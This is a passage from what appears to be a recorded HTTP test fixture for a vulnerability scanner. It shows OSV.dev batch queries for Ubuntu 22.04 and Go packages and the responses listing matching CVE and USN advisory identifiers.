"2026-03-14T09:17:58.405826Z" }, { "id": "USN-7768-1", "modified": "2026-02-10T04:49:49Z" } ] }, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-3219", "modified": "2026-01-20T17:26:42.776809Z" }, { "id": "UBUNTU-CVE-2025-30258", "modified": "2026-02-04T04:30:17.426918Z" }, { "id": "UBUNTU-CVE-2025-68972", 
"modified": "2026-01-20T19:15:15.770361Z" }, { "id": "UBUNTU-CVE-2025-68973", "modified": "2026-02-05T00:30:28.335358Z" }, { "id": "USN-7412-1", "modified": "2026-02-10T04:47:47Z" }, { "id": "USN-7412-2", "modified": "2026-02-10T04:47:47Z" }, { "id": "USN-7946-1", "modified": "2026-02-10T04:50:47Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2016-20013", "modified": "2026-02-03T07:12:11.178156Z" }, { "id": "UBUNTU-CVE-2025-0395", "modified": "2026-02-06T21:35:29.229625Z" }, { "id": "UBUNTU-CVE-2025-15281", "modified": "2026-02-04T07:39:07.958164Z" }, { "id": "UBUNTU-CVE-2025-4802", "modified": "2026-02-04T04:09:49.871743Z" }, { "id": "UBUNTU-CVE-2025-8058", "modified": "2026-02-04T07:39:09.389770Z" }, { "id": "UBUNTU-CVE-2026-0861", "modified": "2026-02-04T07:39:03.415441Z" }, { "id": "UBUNTU-CVE-2026-0915", "modified": "2026-02-23T00:02:27.504192Z" }, { "id": "USN-7259-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7541-1", "modified": "2026-02-10T04:48:59Z" }, { "id": "USN-7760-1", "modified": "2026-02-10T04:49:49Z" }, { "id": "USN-8005-1", "modified": "2026-02-23T00:13:53.339268Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2016-20013", "modified": "2026-02-03T07:12:11.178156Z" }, { "id": "UBUNTU-CVE-2025-0395", "modified": "2026-02-06T21:35:29.229625Z" }, { "id": "UBUNTU-CVE-2025-15281", "modified": "2026-02-04T07:39:07.958164Z" }, { "id": "UBUNTU-CVE-2025-4802", "modified": "2026-02-04T04:09:49.871743Z" }, { "id": "UBUNTU-CVE-2025-8058", "modified": "2026-02-04T07:39:09.389770Z" }, { "id": "UBUNTU-CVE-2026-0861", "modified": "2026-02-04T07:39:03.415441Z" }, { "id": "UBUNTU-CVE-2026-0915", "modified": "2026-02-23T00:02:27.504192Z" }, { "id": "USN-7259-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7541-1", "modified": "2026-02-10T04:48:59Z" }, { "id": "USN-7760-1", "modified": "2026-02-10T04:49:49Z" }, { "id": "USN-8005-1", 
"modified": "2026-02-23T00:13:53.339268Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-1390", "modified": "2026-02-04T04:28:50.933288Z" }, { "id": "USN-7287-1", "modified": "2026-02-10T04:47:15Z" } ] }, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-2236", "modified": "2026-01-20T17:51:42.649938Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-12243", "modified": "2026-02-04T02:53:36.843010Z" }, { "id": "UBUNTU-CVE-2025-14831", "modified": "2026-02-28T05:58:56.935176Z" }, { "id": "UBUNTU-CVE-2025-32988", "modified": "2026-02-04T02:15:37.273955Z" }, { "id": "UBUNTU-CVE-2025-32989", "modified": "2026-02-04T03:37:18.739300Z" }, { "id": "UBUNTU-CVE-2025-32990", "modified": "2026-02-04T03:31:01.615385Z" }, { "id": "UBUNTU-CVE-2025-6395", "modified": "2026-02-04T03:31:22.603031Z" }, { "id": "UBUNTU-CVE-2025-9820", "modified": "2026-02-28T06:16:45.816014Z" }, { "id": "USN-7281-1", "modified": "2026-02-10T04:47:15Z" }, { "id": "USN-7635-1", "modified": "2026-02-10T04:49:34Z" }, { "id": "USN-8043-1", "modified": "2026-02-17T22:00:37.652199Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, {}, { "vulns": [ { "id": 
"UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2025-62813", 
"modified": "2025-10-27T08:32:45.494712Z" } ] }, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-41409", "modified": "2025-10-24T04:53:52Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2017-11164", "modified": "2026-01-20T16:49:00.053545Z" } ] }, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": 
"2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-13176", "modified": "2026-03-09T11:29:11.736076Z" }, { "id": "UBUNTU-CVE-2024-41996", "modified": "2026-02-06T21:00:29.439853Z" }, { "id": "UBUNTU-CVE-2024-9143", "modified": "2026-03-09T11:29:50.088989Z" }, { "id": "UBUNTU-CVE-2025-15467", "modified": "2026-03-05T18:42:43.606385Z" }, { "id": "UBUNTU-CVE-2025-27587", "modified": "2026-02-06T21:55:03.879396Z" }, { "id": "UBUNTU-CVE-2025-68160", "modified": "2026-02-12T06:59:44.011039Z" }, { "id": "UBUNTU-CVE-2025-69418", "modified": "2026-02-06T22:01:44.179826Z" }, { "id": "UBUNTU-CVE-2025-69419", "modified": "2026-02-12T06:59:40.921557Z" }, { "id": "UBUNTU-CVE-2025-69420", "modified": "2026-02-12T06:58:38.833674Z" }, { "id": "UBUNTU-CVE-2025-69421", "modified": "2026-03-02T12:02:19.670699Z" }, { "id": "UBUNTU-CVE-2025-9230", "modified": "2026-03-09T12:25:45.048270Z" }, { "id": "UBUNTU-CVE-2026-22795", "modified": "2026-02-12T06:58:35.942634Z" }, { "id": "UBUNTU-CVE-2026-22796", "modified": "2026-02-12T06:59:02.005868Z" }, { "id": "UBUNTU-CVE-2026-2673", "modified": "2026-03-18T08:04:38.900604Z" }, { "id": "USN-7278-1", "modified": "2026-02-10T04:47:15Z" }, { "id": "USN-7786-1", "modified": "2026-02-10T04:50:09Z" }, { "id": "USN-7980-1", "modified": "2026-03-02T11:56:15.392710Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-7008", "modified": "2025-10-09T04:59:16Z" }, { "id": "UBUNTU-CVE-2025-4598", "modified": "2026-02-04T02:49:04.264249Z" }, { "id": "UBUNTU-CVE-2026-4105", "modified": "2026-03-18T08:05:12.098241Z" }, { "id": "USN-7559-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2021-46848", "modified": "2026-02-12T06:44:04.921097Z" }, { "id": "UBUNTU-CVE-2024-12133", 
"modified": "2026-02-12T06:31:24.332995Z" }, { "id": "UBUNTU-CVE-2025-13151", "modified": "2026-02-12T06:43:59.770392Z" }, { "id": "USN-7275-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7954-1", "modified": "2026-02-10T04:50:47Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2023-7008", "modified": "2025-10-09T04:59:16Z" }, { "id": "UBUNTU-CVE-2025-4598", "modified": "2026-02-04T02:49:04.264249Z" }, { "id": "UBUNTU-CVE-2026-4105", "modified": "2026-03-18T08:05:12.098241Z" }, { "id": "USN-7559-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-4899", "modified": "2025-09-08T16:49:53Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-29383", "modified": "2025-10-24T05:01:54Z" }, { "id": "UBUNTU-CVE-2024-56433", "modified": "2026-01-20T18:02:13.226633Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-29383", "modified": "2025-10-24T05:01:54Z" }, { "id": "UBUNTU-CVE-2024-56433", "modified": "2026-01-20T18:02:13.226633Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-31486", "modified": "2025-10-24T05:01:58Z" }, { "id": "UBUNTU-CVE-2023-47039", "modified": "2025-10-24T05:02:19Z" }, { "id": "UBUNTU-CVE-2024-56406", "modified": "2026-02-04T02:50:55.689079Z" }, { "id": "UBUNTU-CVE-2025-40909", "modified": "2026-02-04T02:15:05.324531Z" }, { "id": 
"USN-7434-1", "modified": "2026-02-10T04:47:48Z" }, { "id": "USN-7678-1", "modified": "2026-02-10T04:49:41Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-45582", "modified": "2026-01-20T18:59:29.811906Z" } ] }, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2026-27171", "modified": "2026-02-27T09:59:13Z" } ] } ] } headers: Content-Length: - "11965" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 14321 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Ubuntu:22.04", "name": "adduser" }, "version": "3.118ubuntu5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "apt" }, "version": "2.4.13" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "base-files" }, "version": "12ubuntu4.7" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "base-passwd" }, "version": "3.5.52build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "bash" }, "version": "5.1-6ubuntu1.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "1:2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "coreutils" }, "version": "8.32-4.1ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "dash" }, "version": "0.5.11+git20210903+057cd650a4ed-3build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "debconf" }, "version": "1.5.79ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "debianutils" }, "version": "5.5-1ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "diffutils" }, "version": "1:3.8-0ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "dpkg" }, "version": "1.21.1ubuntu2.3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "findutils" }, "version": 
"4.8.0-1ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "fzf" }, "version": "0.29.0-1ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.18.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gnupg2" }, "version": "2.2.27-3ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "grep" }, "version": "3.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gzip" }, "version": "1.10-4ubuntu4.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "hostname" }, "version": "3.23ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "init-system-helpers" }, "version": "1.62" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "acl" }, "version": "2.3.1-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "apt" }, "version": "2.4.13" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "attr" }, "version": "1:2.5.1-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "audit" }, "version": "1:3.0.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "audit" }, "version": "1:3.0.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "bzip2" }, "version": "1.0.8-5build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "glibc" }, "version": "2.35-0ubuntu3.8" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "glibc" }, "version": "2.35-0ubuntu3.8" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libcap-ng" }, "version": "0.7.9-2.2build3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libcap2" }, "version": "1:2.44-1ubuntu0.22.04.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libxcrypt" }, "version": 
"1:4.4.27-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "db5.3" }, "version": "5.3.28+dfsg1-0.8ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "cdebconf" }, "version": "0.261ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libffi" }, "version": "3.4.2-4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libgcrypt20" }, "version": "1.9.4-3ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gmp" }, "version": "2:6.2.1+dfsg-3ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gnutls28" }, "version": "3.7.3-4ubuntu1.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libgpg-error" }, "version": "1.43-3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "nettle" }, "version": "3.7.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libidn2" }, "version": "2.3.2-2build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "keyutils" }, "version": "1.6.1-2ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "lz4" }, "version": "1.9.3-2build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "xz-utils" }, "version": "5.2.5-2ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", 
"name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "nettle" }, "version": "3.7.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libnsl" }, "version": "1.3.0-2build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "p11-kit" }, "version": "0.24.0-6build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pcre2" }, "version": "10.39-3ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pcre3" }, "version": "2:8.39-13ubuntu0.22.04.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "procps" }, "version": "2:3.3.17-6ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libseccomp" }, "version": "2.5.3-2ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libselinux" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsemanage" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsemanage" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsepol" }, "version": "3.3-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "openssl" }, "version": "3.0.2-0ubuntu1.18" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "systemd" }, "version": "249.11-0ubuntu3.12" 
}, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtasn1-6" }, "version": "4.18.0-4build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtirpc" }, "version": "1.3.2-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtirpc" }, "version": "1.3.2-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "systemd" }, "version": "249.11-0ubuntu3.12" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libunistring" }, "version": "1.0-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "xxhash" }, "version": "0.8.1-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libzstd" }, "version": "1.4.8+dfsg-3build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "shadow" }, "version": "1:4.8.1-2ubuntu2.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "lsb" }, "version": "11.1.0ubuntu4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "mawk" }, "version": "1.3.4.20200120-3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "shadow" }, "version": "1:4.8.1-2ubuntu2.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "perl" }, "version": "5.34.0-3ubuntu1.3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "procps" }, "version": "2:3.3.17-6ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sed" }, "version": "4.8-1ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": 
"sensible-utils" }, "version": "0.0.17" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sysvinit" }, "version": "3.01-1ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "tar" }, "version": "1.34+dfsg-1ubuntu0.1.22.04.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ubuntu-keyring" }, "version": "2021.03.26" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "usrmerge" }, "version": "25ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "zlib" }, "version": "1:1.2.11.dfsg-2ubuntu9.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/Scanning_Ubuntu_image_with_go_OS_packages_json url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 17153 body: | { "results": [ {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2016-2781", "modified": "2026-03-18T06:32:17.714169Z" }, { "id": "UBUNTU-CVE-2025-5278", "modified": "2026-03-18T07:55:13.290684Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-6297", "modified": "2026-02-04T03:36:18.990840Z" }, { "id": "UBUNTU-CVE-2026-2219", "modified": "2026-03-14T09:17:58.405826Z" }, { "id": "USN-7768-1", "modified": "2026-02-10T04:49:49Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "GO-2022-0477", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0493", "modified": "2026-02-04T03:42:54.589715Z" }, { "id": "GO-2022-0515", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0520", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0521", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0522", "modified": "2024-05-20T16:03:47Z" }, 
{ "id": "GO-2022-0523", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0524", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0525", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0526", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0527", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0531", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0532", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0533", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0537", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0969", "modified": "2026-02-04T02:41:02.475503Z" }, { "id": "GO-2022-1037", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-1038", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-1039", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-1095", "modified": "2026-02-04T04:25:45.960420Z" }, { "id": "GO-2022-1143", "modified": "2026-02-04T04:08:13.589543Z" }, { "id": "GO-2022-1144", "modified": "2026-02-04T04:29:40.352025Z" }, { "id": "GO-2023-1568", "modified": "2026-02-04T02:54:08.789114Z" }, { "id": "GO-2023-1569", "modified": "2026-02-04T03:22:48.161542Z" }, { "id": 